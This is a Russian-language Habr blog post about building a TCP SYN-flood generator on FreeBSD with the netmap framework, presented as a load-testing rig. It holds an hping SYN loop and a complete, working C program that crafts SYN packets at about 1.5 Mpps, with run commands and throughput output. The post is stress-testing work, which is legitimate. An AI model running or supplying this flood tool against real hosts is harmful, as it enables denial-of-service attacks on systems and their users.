Pull to refresh

TCP(syn-flood)-netmap-generator производительностью 1,5 mpps

Reading time14 min
Views21K
Дано:
# pciconf -lv | grep -i device | grep -i network
    device     = I350 Gigabit Network Connection
# dmesg | grep CPU:
    CPU: Intel(R) Core(TM)2 Duo CPU     E7300  @ 2.66GHz (2666.69-MHz K8-class CPU)
# uname -orp
    FreeBSD 9.1-RELEASE amd64

Задача:
Необходимо на данном оборудовании и ОС создать нагрузочную вилку в виде tcp(syn)-генератора трафика производительностью не менее 500kpps.

Решение:

В первом приближении была предпринята попытка использовать hping.
Собираем с поддержкой tcl. Пишем небольшой скрипт:

while {1} {
  hping send "ip(saddr=10.0.0.1,daddr=10.0.0.2)+tcp(sport=14000,dport=80,flags=s)"
  }

Запускаем:
# hping exec ./synflood1.htcl

Смотрим производительность:
# netstat -w1 -I igb0
            input         (igb0)           output
   packets  errs idrops      bytes    packets  errs      bytes colls
     21384     0     0    1283040      21582     0    1165428     0
     21264     0     0    1275840      21464     0    1159056     0
     21361     0     0    1281660      21559     0    1164186     0


Запущенные 10 экземпляров смогли «раскачать» до 55kpps, при этом оба ядра были утилизированы.
# top -PSCH
last pid:  1691;  load averages: 10.02,  6.83,  3.32                        up 0+00:59:11  12:31:18
125 processes: 13 running, 86 sleeping, 26 waiting
CPU 0: 77.2% user,  0.0% nice, 17.1% system,  5.7% interrupt,  0.0% idle
CPU 1: 76.4% user,  0.0% nice, 10.6% system, 13.0% interrupt,  0.0% idle

Тюнинг системы позволил ещё немного увеличить скорострельность, но итоговые цифры остановились на ~125kpps.

Полученный результат не соответствует требованиям. Во втором приближении рассмотрим фреймворк netmap от Luigi Rizzo активно афишируемый в обзорах 9-ки, но обсуждения и результатов его практического применения в рунете я не обнаружил.
Для работы необходимо пересобрать ядро с параметром:
device netmap

За основу взят код исходников от самого автора с добавлением в оный формирования tcp-пакета. Приводится полностью работоспособный, без купюр.
tcp-gen.c
/*
 * Пример создания многопоточного
 * tcp-генератора на основе netmap
 */

const char *default_payload =
	"netmap pkt-gen Luigi Rizzo and Matteo Landi\n" "http://info.iet.unipi.it/~luigi/netmap/ ";

#include <pthread.h>	/* pthread_* */
#include <pthread_np.h>	/* pthread w/ affinity */
#include <stdlib.h>
#include <stdio.h>
#include <inttypes.h>	/* PRI* macros */
#include <string.h>	/* strcmp */
#include <fcntl.h>	/* open */
#include <unistd.h>	/* close */
#include <ifaddrs.h>	/* getifaddrs */

#include <sys/mman.h>	/* PROT_* */
#include <sys/ioctl.h>	/* ioctl */
#include <sys/poll.h>
#include <arpa/inet.h>	/* ntohs */
#include <sys/sysctl.h>	/* sysctl */

#include <net/ethernet.h>
#include <net/if.h>	/* ifreq */
#include <net/if_dl.h>	/* LLADDR */

#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>

#include <net/netmap.h>
#include <net/netmap_user.h>

static inline int min(int a, int b) {
	return a < b ? a : b;
}

/* debug support */
#define D(format, ...)				\
	fprintf(stderr, "%s [%d] " format "\n", 	\
	__FUNCTION__, __LINE__, ##__VA_ARGS__)

#ifndef EXPERIMENTAL
#define EXPERIMENTAL 0
#endif

#define MAX_QUEUES 64	/* no need to limit */

#define SKIP_PAYLOAD 1 /* do not check payload. */

inline void prefetch(const void *x) {
	__asm volatile("prefetcht0 %0" :: "m"(*(const unsigned long *)x));
}

/*
 * sum_w()
 *
 * Do the one's complement sum thing over a range of words
 * Ideally, this should get replaced by an assembly version.
 */

static u_int32_t
	/* static inline u_int32_t */
	sum_w(u_int16_t *buf, int nwords) {
	register u_int32_t sum = 0;

	while (nwords >= 16) {
		sum += (u_int16_t) ntohs(*buf++);
		sum += (u_int16_t) ntohs(*buf++);
		sum += (u_int16_t) ntohs(*buf++);
		sum += (u_int16_t) ntohs(*buf++);
		sum += (u_int16_t) ntohs(*buf++);
		sum += (u_int16_t) ntohs(*buf++);
		sum += (u_int16_t) ntohs(*buf++);
		sum += (u_int16_t) ntohs(*buf++);
		sum += (u_int16_t) ntohs(*buf++);
		sum += (u_int16_t) ntohs(*buf++);
		sum += (u_int16_t) ntohs(*buf++);
		sum += (u_int16_t) ntohs(*buf++);
		sum += (u_int16_t) ntohs(*buf++);
		sum += (u_int16_t) ntohs(*buf++);
		sum += (u_int16_t) ntohs(*buf++);
		sum += (u_int16_t) ntohs(*buf++);
		nwords -= 16;
	}
	while (nwords--)
		sum += (u_int16_t) ntohs(*buf++);
	return (sum);
}

int tcp_csum(struct ip *ip, struct tcphdr * const tcp) {
	// struct tcphdr	*const tcp = (struct tcphdr *) ((long *) ip + ip->ip_hl);
	u_int32_t sum;
	int tcp_len;

	/* Calculate total length of the TCP segment */

	tcp_len = (u_int16_t) ntohs(ip->ip_len) - (ip->ip_hl << 2);

	/* Do pseudo-header first */

	sum = sum_w((u_int16_t*)&ip->ip_src, 4);

	sum += (u_int16_t) IPPROTO_TCP;
	sum += (u_int16_t) tcp_len;

	/* Sum up tcp part */

	sum += sum_w((u_int16_t*) tcp, tcp_len >> 1);
	if (tcp_len & 1)
		sum += (u_int16_t)(((u_char *) tcp)[tcp_len - 1] << 8);

	/* Flip it & stick it */

	sum = (sum >> 16) + (sum & 0xFFFF);
	sum += (sum >> 16);
	sum = ~sum;

	tcp->th_sum = htons(sum);

	return tcp->th_sum;
}

// XXX only for multiples of 32 bytes, non overlapped.
static inline void pkt_copy(void *_src, void *_dst, int l) {
	uint64_t *src = _src;
	uint64_t *dst = _dst;
#define likely(x)       __builtin_expect(!!(x), 1)
#define unlikely(x)       __builtin_expect(!!(x), 0)
	if (unlikely(l >= 1024)) {
		bcopy(src, dst, l);
		return;
	}
	for (; l > 0; l -= 64) {
		*dst++ = *src++;
		*dst++ = *src++;
		*dst++ = *src++;
		*dst++ = *src++;
		*dst++ = *src++;
		*dst++ = *src++;
		*dst++ = *src++;
		*dst++ = *src++;
	}
}

struct pkt {
	struct ether_header eh;
	struct ip ip;

	struct tcphdr tcp;

	uint8_t body[2048]; // XXX hardwired
} __attribute__((__packed__));

/*
 * global arguments for all threads
 */
struct glob_arg {
	const char *src_ip;
	const char *dst_ip;
	const char *src_mac;
	const char *dst_mac;
	int pkt_size;
	int burst;
	int nthreads;
	int cpus;
};

struct mystat {
	uint64_t containers[8];
};

/*
 * Arguments for a new thread. The same structure is used by
 * the source and the sink
 */
struct targ {
	struct glob_arg *g;
	int used;
	int completed;
	int fd;
	struct nmreq nmr;
	struct netmap_if *nifp;
	uint16_t qfirst, qlast; /* range of queues to scan */
	uint64_t count;
	struct timeval tic, toc;
	int me;
	pthread_t thread;
	int affinity;

	uint8_t dst_mac[6];
	uint8_t src_mac[6];
	u_int dst_mac_range;
	u_int src_mac_range;
	uint32_t dst_ip;
	uint32_t src_ip;
	u_int dst_ip_range;
	u_int src_ip_range;

	struct pkt pkt;
};

static struct targ *targs;
static int global_nthreads;

/* control-C handler */
static void sigint_h(__unused int sig) {
	for (int i = 0; i < global_nthreads; i++) {
		/* cancel active threads. */
		if (targs[i].used == 0)
			continue;

		D("Cancelling thread #%d\n", i);
		pthread_cancel(targs[i].thread);
		targs[i].used = 0;
	}

	signal(SIGINT, SIG_DFL);
}

/* sysctl wrapper to return the number of active CPUs */
static int system_ncpus(void) {
	int mib[2], ncpus;
	size_t len;

	mib[0] = CTL_HW;
	mib[1] = HW_NCPU;
	len = sizeof(mib);
	sysctl(mib, 2, &ncpus, &len, NULL, 0);

	return (ncpus);
}

/*
 * locate the src mac address for our interface, put it
 * into the user-supplied buffer. return 0 if ok, -1 on error.
 */
static int source_hwaddr(const char *ifname, char *buf) {
	struct ifaddrs *ifaphead, *ifap;
	int l = sizeof(ifap->ifa_name);

	if (getifaddrs(&ifaphead) != 0) {
		D("getifaddrs %s failed", ifname);
		return (-1);
	}

	for (ifap = ifaphead; ifap; ifap = ifap->ifa_next) {
		struct sockaddr_dl *sdl = (struct sockaddr_dl*)ifap->ifa_addr;
		uint8_t *mac;

		if (!sdl || sdl->sdl_family != AF_LINK)
			continue;
		if (strncmp(ifap->ifa_name, ifname, l) != 0)
			continue;
		mac = (uint8_t*)LLADDR(sdl);
		sprintf(buf, "%02x:%02x:%02x:%02x:%02x:%02x", mac[0], mac[1], mac[2],
			mac[3], mac[4], mac[5]);
		break;
	}
	freeifaddrs(ifaphead);
	return ifap ? 0 : 1;
}

/* set the thread affinity. */
static int setaffinity(pthread_t me, int i) {
	cpuset_t cpumask;

	if (i == -1)
		return 0;

	/* Set thread affinity affinity. */
	CPU_ZERO(&cpumask);
	CPU_SET(i, &cpumask);

	if (pthread_setaffinity_np(me, sizeof(cpuset_t), &cpumask) != 0) {
		D("Unable to set affinity");
		return 1;
	}
	return 0;
}

/* Compute the checksum of the given ip header. */
static uint16_t checksum(const void *data, uint16_t len) {
	const uint8_t *addr = data;
	uint32_t sum = 0;

	while (len > 1) {
		sum += addr[0] * 256 + addr[1];
		addr += 2;
		len -= 2;
	}

	if (len == 1)
		sum += *addr * 256;

	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);

	sum = htons(sum);

	return ~sum;
}

/*
 * Fill a packet with some payload.
 */
static void initialize_packet(struct targ *targ) {
	struct pkt *pkt = &targ->pkt;
	struct ether_header *eh;
	struct ip *ip;
	struct tcphdr *tcp;
	// uint16_t paylen = targ->g->pkt_size - sizeof(*eh) - sizeof(*ip);
	uint16_t paylen = targ->g->pkt_size -sizeof(*eh)-sizeof(*ip);
	int i, l, l0 = strlen(default_payload);
	char *p;

	for (i = 0; i < paylen;) {
		l = min(l0, paylen - i);
		bcopy(default_payload, pkt->body + i, l);
		i += l;
	}
	pkt->body[i - 1] = '\0';

	tcp = &pkt->tcp;

	tcp->th_sport = htons(14000); // Contains the source port.
	tcp->th_dport = htons(80); // Contains the destination port.
	tcp->th_seq = ntohl(rand()); // Contains the sequence number.
	tcp->th_ack = rand(); // Contains the acknowledgement number.
	tcp->th_x2 = 0; // Unused.
	tcp->th_off = 5; // Contains the data offset.

	tcp->th_flags = TH_SYN; // Contains one of the following values:
	/*
	 Flag 	Value 	Description
	 TH_FIN 	0x01	Indicates that the transmission is finishing.
	 TH_SYN	0x02	Indicates that sequence numbers are being synchronized.
	 TH_RST	0x04	Indicates that the connection is being reset.
	 TH_PUSH	0x08	Indicataes that data is being pushed to the application level.
	 TH_ACK	0x10	Indicates that the acknowledge field is valid.
	 TH_URG	0x20	Indicates that urgent data is present.
	 */
	tcp->th_win = htons(512); // Contains the window size.
	// tcp->th_sum = 0; 		// Contains the checksum.
	tcp->th_urp = 0; // Contains the urgent pointer.

	ip = &pkt->ip;
	ip->ip_v = 4;
	ip->ip_hl = 5;
	ip->ip_id = 0;
	ip->ip_tos = IPTOS_LOWDELAY;
	ip->ip_len = ntohs(sizeof(struct ip)+sizeof(struct tcphdr));
	ip->ip_off = htons(IP_DF); /* Don't fragment */
	ip->ip_ttl = IPDEFTTL;
	// ip->ip_ttl = 255;
	ip->ip_p = IPPROTO_TCP;
	inet_aton(targ->g->src_ip, (struct in_addr *)&ip->ip_src);
	inet_aton(targ->g->dst_ip, (struct in_addr *)&ip->ip_dst);
	targ->dst_ip = ip->ip_dst.s_addr;
	targ->src_ip = ip->ip_src.s_addr;
	p = index(targ->g->src_ip, '-');
	if (p) {
		targ->dst_ip_range = atoi(p + 1);
		D("dst-ip sweep %d addresses", targ->dst_ip_range);
	}
	ip->ip_sum = checksum(ip, sizeof(*ip));
	tcp->th_sum = tcp_csum(ip, tcp);

	eh = &pkt->eh;
	bcopy(ether_aton(targ->g->src_mac), targ->src_mac, 6);
	bcopy(targ->src_mac, eh->ether_shost, 6);
	p = index(targ->g->src_mac, '-');
	if (p)
		targ->src_mac_range = atoi(p + 1);

	bcopy(ether_aton(targ->g->dst_mac), targ->dst_mac, 6);
	bcopy(targ->dst_mac, eh->ether_dhost, 6);
	p = index(targ->g->dst_mac, '-');
	if (p)
		targ->dst_mac_range = atoi(p + 1);
	eh->ether_type = htons(ETHERTYPE_IP);

}

/*
 * create and enqueue a batch of packets on a ring.
 * On the last one set NS_REPORT to tell the driver to generate
 * an interrupt when done.
 */
static int send_packets(struct netmap_ring *ring, struct pkt *pkt, int size,
	u_int count) {
	u_int sent, cur = ring->cur;

	if (ring->avail < count)
		count = ring->avail;

	for (sent = 0; sent < count; sent++) {
		struct netmap_slot *slot = &ring->slot[cur];
		char *p = NETMAP_BUF(ring, slot->buf_idx);

		pkt_copy(pkt, p, size);

		slot->len = size;
		if (sent == count - 1)
			slot->flags |= NS_REPORT;
		cur = NETMAP_RING_NEXT(ring, cur);
	}
	ring->avail -= sent;
	ring->cur = cur;

	return (sent);
}

static void * sender_body(void *data) {
	struct targ *targ = (struct targ*) data;
	struct pollfd fds[1];
	struct netmap_if *nifp = targ->nifp;
	struct netmap_ring *txring;
	int i, sent = 0;
	D("start");
	if (setaffinity(targ->thread, targ->affinity))
		goto quit;
	/* setup poll(2) mechanism. */
	memset(fds, 0, sizeof(fds));
	fds[0].fd = targ->fd;
	fds[0].events = (POLLOUT);

	/* main loop. */
	gettimeofday(&targ->tic, NULL); {
		while (1) {
			/*
			 * wait for available room in the send queue(s)
			 */
			if (poll(fds, 1, 2000) <= 0) {
				D("poll error/timeout on queue %d\n", targ->me);
				goto quit;
			}
			/*
			 * scan our queues and send on those with room
			 */
			for (i = targ->qfirst; i < targ->qlast; i++) {
				// int m, limit = targ->g->burst;
				int m, limit = 512;

				txring = NETMAP_TXRING(nifp, i);
				if (txring->avail == 0)
					continue;

				m = send_packets(txring, &targ->pkt, targ->g->pkt_size, limit);
				sent += m;
				targ->count = sent;
			}
		}
		/* flush any remaining packets */
		ioctl(fds[0].fd, NIOCTXSYNC, NULL);

		/* final part: wait all the TX queues to be empty. */
		for (i = targ->qfirst; i < targ->qlast; i++) {

			txring = NETMAP_TXRING(nifp, i);
			while (!NETMAP_TX_RING_EMPTY(txring)) {
				ioctl(fds[0].fd, NIOCTXSYNC, NULL);
				usleep(1); /* wait 1 tick */
			}
		}
	}

	gettimeofday(&targ->toc, NULL);
	targ->completed = 1;
	targ->count = sent;

quit:
	/* reset the ``used`` flag. */
	targ->used = 0;

	return (NULL);
}

static void usage(void) {
	const char *cmd = "pkt-gen";
	fprintf(stderr,
		"Usage:\n" "%s arguments\n" "\t-i interface		interface name\n"
		"\t-l pkts_size		in bytes excluding CRC\n" "\t-d dst-ip		end with %%n to sweep n addresses\n"
		"\t-s src-ip		end with %%n to sweep n addresses\n" "\t-D dst-mac		end with %%n to sweep n addresses\n"
		"\t-S src-mac		end with %%n to sweep n addresses\n" "", cmd);

	exit(0);
}

int main(int arc, char **argv) {
	int i, fd;

	struct glob_arg g;

	struct nmreq nmr;
	void *mmap_addr; /* the mmap address */
	void *(*td_body)(void *) = sender_body;
	int ch;
	int report_interval = 1000; /* report interval */
	char *ifname = NULL;
	// int wait_link = 2;
	int devqueues = 1; /* how many device queues */

	/* initialize random seed: */
	srand(time(NULL));

	bzero(&g, sizeof(g));

	g.src_ip = "10.0.0.1";
	g.dst_ip = "10.0.0.2";
	g.dst_mac = "ff:ff:ff:ff:ff:ff";
	// g.dst_mac = NULL;
	g.src_mac = NULL;
	g.pkt_size = 60;
	g.burst = 512; // default
	g.nthreads = 2; // работаем в 2 потока
	// g.cpus = 1;
	g.cpus = system_ncpus(); // задействуем все доступные процессоры

	while ((ch = getopt(arc, argv, "i:l:d:s:D:S:v")) != -1) {
		switch (ch) {
		default:
			D("bad option %c %s", ch, optarg);
			usage();
			break;
		case 'i': /* interface */
			ifname = optarg;
			break;
		case 'l': /* pkt_size */
			g.pkt_size = atoi(optarg);
			break;
		case 'd':
			g.dst_ip = optarg;
			break;
		case 's':
			g.src_ip = optarg;
			break;
		case 'D': /* destination mac */
			g.dst_mac = optarg;
			struct ether_addr *mac = ether_aton(g.dst_mac);
			D("ether_aton(%s) gives %p", g.dst_mac, mac);
			break;
		case 'S': /* source mac */
			g.src_mac = optarg;
			break;
		}
	}

	if (ifname == NULL) {
		D("missing ifname");
		usage();
	} {
		int n = system_ncpus();
		if (g.cpus < 0 || g.cpus > n) {
			D("%d cpus is too high, have only %d cpus", g.cpus, n);
			usage();
		}
		if (g.cpus == 0)
			g.cpus = n;
	}
	if (g.pkt_size < 16 || g.pkt_size > 1536) {
		D("bad pktsize %d\n", g.pkt_size);
		usage();
	}

	if (td_body == sender_body && g.src_mac == NULL) {
		static char mybuf[20] = "ff:ff:ff:ff:ff:ff";
		/* retrieve source mac address. */
		if (source_hwaddr(ifname, mybuf) == -1) {
			D("Unable to retrieve source mac");
			// continue, fail later
		}
		g.src_mac = mybuf;
	}

	{
		bzero(&nmr, sizeof(nmr));
		nmr.nr_version = NETMAP_API;
		/*
		 * Open the netmap device to fetch the number of queues of our
		 * interface.
		 *
		 * The first NIOCREGIF also detaches the card from the
		 * protocol stack and may cause a reset of the card,
		 * which in turn may take some time for the PHY to
		 * reconfigure.
		 */
		fd = open("/dev/netmap", O_RDWR);
		if (fd == -1) {
			D("Unable to open /dev/netmap");
			// fail later
		}
		else {
			if ((ioctl(fd, NIOCGINFO, &nmr)) == -1) {
				D("Unable to get if info without name");
			}
			else {
				D("map size is %d Kb", nmr.nr_memsize >> 10);
			}
			bzero(&nmr, sizeof(nmr));
			nmr.nr_version = NETMAP_API;
			strncpy(nmr.nr_name, ifname, sizeof(nmr.nr_name));
			if ((ioctl(fd, NIOCGINFO, &nmr)) == -1) {
				D("Unable to get if info for %s", ifname);
			}
			devqueues = nmr.nr_rx_rings;
		}

		/* validate provided nthreads. */
		if (g.nthreads < 1 || g.nthreads > devqueues) {
			D("bad nthreads %d, have %d queues", g.nthreads, devqueues);
			// continue, fail later
		}

		/*
		 * Map the netmap shared memory: instead of issuing mmap()
		 * inside the body of the threads, we prefer to keep this
		 * operation here to simplify the thread logic.
		 */
		D("mmapping %d Kbytes", nmr.nr_memsize >> 10);
		mmap_addr = (struct netmap_d*) mmap(0, nmr.nr_memsize,
			PROT_WRITE | PROT_READ, MAP_SHARED, fd, 0);
		if (mmap_addr == MAP_FAILED) {
			D("Unable to mmap %d KB", nmr.nr_memsize >> 10);
			// continue, fail later
		}

		/*
		 * Register the interface on the netmap device: from now on,
		 * we can operate on the network interface without any
		 * interference from the legacy network stack.
		 *
		 * We decide to put the first interface registration here to
		 * give time to cards that take a long time to reset the PHY.
		 */
		nmr.nr_version = NETMAP_API;
		if (ioctl(fd, NIOCREGIF, &nmr) == -1) {
			D("Unable to register interface %s", ifname);
			// continue, fail later
		}

		/* Print some debug information. */
		fprintf(stdout, "%s %s: %d queues, %d threads and %d cpus.\n",
			(td_body == sender_body) ? "Sending on" : "Receiving from", ifname,
			devqueues, g.nthreads, g.cpus);
		if (td_body == sender_body) {
			fprintf(stdout, "%s -> %s (%s -> %s)\n", g.src_ip, g.dst_ip,
				g.src_mac, g.dst_mac);
		}

		/* Exit if something went wrong. */
		if (fd < 0) {
			D("Aborting");
			usage();
		}
	}

	// "Wait 3 secs for phy reset"
	// sleep(wait_link);
	sleep(3);
	D("Ready...");

	/* Install ^C handler. */
	global_nthreads = g.nthreads;
	signal(SIGINT, sigint_h);

	targs = calloc(g.nthreads, sizeof(*targs));
	/*
	 * Now create the desired number of threads, each one
	 * using a single descriptor.
	 */
	for (i = 0; i < g.nthreads; i++) {
		struct netmap_if *tnifp;
		struct nmreq tifreq;
		int tfd;

		/* register interface. */
		tfd = open("/dev/netmap", O_RDWR);
		if (tfd == -1) {
			D("Unable to open /dev/netmap");
			continue;
		}

		bzero(&tifreq, sizeof(tifreq));
		strncpy(tifreq.nr_name, ifname, sizeof(tifreq.nr_name));
		tifreq.nr_version = NETMAP_API;
		tifreq.nr_ringid = (g.nthreads > 1) ? (i | NETMAP_HW_RING) : 0;

		if ((ioctl(tfd, NIOCREGIF, &tifreq)) == -1) {
			D("Unable to register %s", ifname);
			continue;
		}
		tnifp = NETMAP_IF(mmap_addr, tifreq.nr_offset);

		/* start threads. */
		bzero(&targs[i], sizeof(targs[i]));
		targs[i].g = &g;
		targs[i].used = 1;
		targs[i].completed = 0;
		targs[i].fd = tfd;
		targs[i].nmr = tifreq;
		targs[i].nifp = tnifp;
		targs[i].qfirst = (g.nthreads > 1) ? i : 0;
		targs[i].qlast = (g.nthreads > 1) ? i + 1 : tifreq.nr_tx_rings;
		targs[i].me = i;
		targs[i].affinity = g.cpus ? i % g.cpus : -1;
		if (td_body == sender_body) {
			/* initialize the packet to send. */
			initialize_packet(&targs[i]);
		}

		if (pthread_create(&targs[i].thread, NULL, td_body, &targs[i]) == -1) {
			D("Unable to create thread %d", i);
			targs[i].used = 0;
		}
	}

	{
		uint64_t my_count = 0, prev = 0;
		uint64_t count = 0;
		struct timeval tic, toc;
		gettimeofday(&toc, NULL);
		for (; ;) {

			struct timeval now, delta;
			uint64_t pps;
			int done = 0;

			delta.tv_sec = report_interval / 1000;
			delta.tv_usec = (report_interval % 1000) * 1000;
			select(0, NULL, NULL, NULL, &delta);
			gettimeofday(&now, NULL);
			timersub(&now, &toc, &toc);
			my_count = 0;
			for (i = 0; i < g.nthreads; i++) {
				my_count += targs[i].count;
				if (targs[i].used == 0)
					done++;
			}
			pps = toc.tv_sec * 1000000 + toc.tv_usec;
			if (pps < 10000)
				continue;
			pps = (my_count - prev) * 1000000 / pps;
			D("%" PRIu64 " pps", pps);
			prev = my_count;
			toc = now;
			if (done == g.nthreads)
				break;
		}

		timerclear(&tic);
		timerclear(&toc);
		for (i = 0; i < g.nthreads; i++) {
			/*
			 * Join active threads, unregister interfaces and close
			 * file descriptors.
			 */
			pthread_join(targs[i].thread, NULL);
			ioctl(targs[i].fd, NIOCUNREGIF, &targs[i].nmr);
			close(targs[i].fd);

			if (targs[i].completed == 0)
				continue;

			/*
			 * Collect threads output and extract information about
			 * how long it took to send all the packets.
			 */
			count += targs[i].count;
			if (!timerisset(&tic) || timercmp(&targs[i].tic, &tic, <))
				tic = targs[i].tic;
			if (!timerisset(&toc) || timercmp(&targs[i].toc, &toc, >))
				toc = targs[i].toc;
		}

	}

	ioctl(fd, NIOCUNREGIF, &nmr);
	munmap(mmap_addr, nmr.nr_memsize);
	close(fd);

	return (0);
}
/* end of file */


Компилируем, запускаем.

# ./tcp-gen -i igb0 -d 10.0.0.2 -D 00:1b:21:a3:5f:fc -s 10.0.0.1 -l 60
main [543] ether_aton(00:1b:21:a3:5f:fc) gives 0x800fac8d2
main [600] map size is 207712 Kb
main [622] mmapping 207712 Kbytes
Sending on igb0: 2 queues, 2 threads and 2 cpus.
10.0.0.1 -> 10.0.0.2 (a0:36:9f:06:81:d6 -> 00:1b:21:a3:5f:fc)
main [663] Ready...
sender_body [422] start
sender_body [422] start
main [746] 1003502 pps
main [746] 1488140 pps
main [746] 1488132 pps
main [746] 1488135 pps
main [746] 1488136 pps
main [746] 1488137 pps
main [746] 1488141 pps
main [746] 1488132 pps
main [746] 1488134 pps
main [746] 1488134 pps
^Csigint_h [215] Cancelling thread #0

sigint_h [215] Cancelling thread #1

main [746] 1296740 pps


Утилита отчитывается о без малого 1,5mpps. Нагрузка составляет:
last pid:  1789;  load averages:  1.17,  0.43,  0.95                        up 0+01:23:20  12:55:27
108 processes: 5 running, 77 sleeping, 26 waiting
CPU 0:  5.9% user,  0.0% nice, 90.9% system,  3.1% interrupt,  0.0% idle
CPU 1:  0.0% user,  0.0% nice, 95.3% system,  4.7% interrupt,  0.0% idle
Mem: 18M Active, 14M Inact, 313M Wired, 14M Buf, 3545M Free
Swap: 2572M Total, 2572M Free

  PID USERNAME PRI NICE   SIZE    RES STATE   C   TIME    CPU COMMAND
 1765 root     102    0   217M  6040K RUN     1   0:53 99.46% pkt-gen{pkt-gen}
 1765 root     102    0   217M  6040K CPU0    0   0:53 99.37% pkt-gen{pkt-gen}
   12 root     -92    -     0K   416K WAIT    0   0:14  2.29% intr{irq256: igb0:que}
   12 root     -92    -     0K   416K WAIT    1   0:43  1.86% intr{irq257: igb0:que}
   11 root     155 ki31     0K    32K RUN     0  74:15  0.00% idle{idle: cpu0}
   11 root     155 ki31     0K    32K RUN     1  74:04  0.00% idle{idle: cpu1}


Смотрим прилетающие пакеты:
tcpdump -i em1 -n -vvv
13:14:44.814897 IP (tos 0x10, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
    10.0.0.1.14000 > 10.0.0.2.80: Flags [S], cksum 0x4ae2 (correct), seq 1103125611, win 512

Замерять производительность на генерируемой машине не представляется возможным. Атакуемая система в свою очередь отчитывается лишь о 700kpps, но есть подозрение что она просто не в состоянии обработать трафик, потому ставим промежуточный коммутатор и смотрим, кто-же врёт:
image
Как видно на коммутаторе генератор действительно «произвёл» почти полтора миллиона пакетов. Тем самым полученный трафик в 3 раза перекрывает поставленную задачу, за что выказываю огромную благодарность г-ну Luigi Rizzo.

При работе обнаружился один недостаток — при запуске netmap отключает карту от сетевого стека переводя в специальный netmap-режим. Иногда адаптер не выходит из этого режима. Для этого приходится делать ему down/up. Отмечу, что данная проблема возникала только на картах igb (тестировались также em и re). Возможно, это проблема лишь данной карты/партии.

Ссылки:
Сайт фрэймворка — info.iet.unipi.it/~luigi/netmap
GoogleTechTalks video on netmap — www.youtube.com/watch?v=SPtoXNW9yEQ
Tags:
Hubs:
Total votes 34: ↑31 and ↓3+28
Comments19

Articles